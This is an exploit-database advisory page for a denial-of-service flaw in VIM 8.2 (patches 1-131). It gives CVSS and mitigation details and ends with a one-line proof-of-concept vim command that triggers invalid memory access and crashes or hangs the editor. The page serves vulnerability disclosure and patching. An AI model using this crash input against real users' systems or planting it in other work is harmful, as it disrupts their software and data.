header-logo
Suggest Exploit
vendor:
VIM - Vi IMproved
by:
Dhiraj Mishra
5.5
CVSS
MEDIUM
DoS
CWE
Product Name: VIM - Vi IMproved
Affected Version From: VIM - Vi IMproved 8.2 (Included patches: 1-131)
Affected Version To:
Patch Exists: YES
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2019

VIM 8.2 – Denial of Service (PoC)

This is a proof-of-concept exploit for a Denial of Service vulnerability in VIM 8.2. The vulnerability allows an attacker to cause a crash or hang the VIM process by executing a specific command.

Mitigation:

The vendor has released patches to address this vulnerability. It is recommended to update VIM to the latest version.
Source

Exploit-DB raw data:

# Exploit Title: VIM 8.2 - Denial of Service (PoC)
# Date: 2019-12-17
# Vulnerability: DoS
# Vulnerability Discovery: Dhiraj Mishra
# Vulnerable Version: VIM - Vi IMproved 8.2 (Included patches: 1-131)
# Vendor Homepage: https://www.vim.org/
# References:
# https://github.com/vim/vim/commit/98a336dd497d3422e7efeef9f24cc9e25aeb8a49
#  Invalid memory access with search command

PoC: vim --clean -e -s -c 'exe "norm /\x80PS"'